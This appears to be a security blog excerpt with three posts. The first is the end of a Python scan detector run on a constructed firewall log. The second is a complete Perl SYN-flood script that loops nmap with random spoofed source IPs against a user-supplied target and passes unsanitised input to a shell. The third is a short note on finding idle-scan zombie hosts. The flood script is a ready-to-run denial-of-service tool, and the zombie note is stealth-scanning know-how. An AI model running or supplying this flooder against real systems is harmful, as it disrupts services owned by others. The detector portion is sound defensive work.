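    # 3) Several sources scanning one target at once: a decoy set.
    for (dst, w), srcs in scanners.items():
        if len(srcs) > 1:
            alerts.append(f"decoy set against {dst}: {sorted(srcs)} (the real scanner is one of them)")
    return alerts


def constructed_log():
    """Constructed iptables-style log: a decoy scan, a -g probe, a -T0 scan and normal noise."""
    base = 28 * 3600
    lines = []

    def syn(ts, src, dst, spt, dpt):
        lines.append(f"{ts} fw kernel: IN=eth0 OUT= SRC={src} DST={dst} PROTO=TCP SPT={spt} DPT={dpt} SYN URGP=0")

    # nmap -sS -D ... 192.168.0.251: four decoys plus the real scanner, 12 ports each
    for i, src in enumerate(["192.168.0.3", "192.168.0.5", "192.168.0.7", "192.168.0.9", "192.168.0.11"]):
        for dpt in range(20, 32):
            syn(base + 10 + i, src, "192.168.0.251", 40000 + dpt, dpt)
    # nmap -sS -g 53: one probe whose source port is 53
    syn(base + 5, "10.0.0.66", "192.168.0.1", 53, 22)
    # nmap -T0 style: ten ports, one probe every five minutes
    for i, dpt in enumerate([21, 22, 23, 25, 53, 80, 110, 143, 443, 445]):
        syn(base + 60 + 300 * i, "192.168.0.77", "192.168.0.1", 51000 + i, dpt)
    # background noise: one normal client connection
    syn(base + 70, "192.168.0.20", "192.168.0.1", 51234, 443)
    return lines


if __name__ == "__main__":
    for alert in analyze(constructed_log()):
        print(alert)
```

Real syslog lines carry a textual timestamp rather than an epoch number, so parse_line's first regex is the one part to adapt; the rest works unchanged on any LOG target that prints SRC/DST/SPT/DPT.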

Saturday, July 4, 2020

[nmap]syn_flood_through_nmap.pl

#!/usr/bin/perl -w
# Unbuffered STDOUT so the prompts appear before <STDIN> blocks.
$|=1;

# Build a random dotted-quad address to use as the spoofed source.
sub randomip(){
    @digits = ();
    for (0..3) {
        push @digits, int (rand (255) + 1);
    }
    return join '.', @digits;
}
#print randomip(); #DEBUG

# Abort early if nmap is not on the PATH.
sub check_nmap(){
    $result = `which nmap`;
    if(length($result)==0){
        die "Please install Nmap.\n";
    }
    return;
}

&check_nmap();
print("Target IP address (e.g. 192.168.0.1): ");
$target_ip=<STDIN>;
chomp($target_ip);        # chomp strips only the trailing newline
print("Target TCP port (e.g. 25): ");
$target_port=<STDIN>;
chomp($target_port);
print("Network Interface sending out SYN (e.g. eth0): ");
$network_adapter=<STDIN>;
chomp($network_adapter);

print("Launching SYN Flood...\n");

# Each iteration sends one SYN from a fresh spoofed source; runs until interrupted.
while(1){
    $src_ip = &randomip();
    system("nmap -e $network_adapter -Pn -sS -T5 -p $target_port -S $src_ip $target_ip");
}

Friday, July 3, 2020

Thursday, July 2, 2020

[eCPPT][nmap]Confirm if a remote machine can be used as a zombie

#nmap -O -v -n 192.168.0.1
OR (when you already know which remote TCP port is open, such as TCP 135 in the following example):
# nmap -O -v -n -p 135 10.50.97.10

The output line below shows that the machine in question can serve as a zombie for Nmap's Idle Scan:
IP ID Sequence Generation: Incremental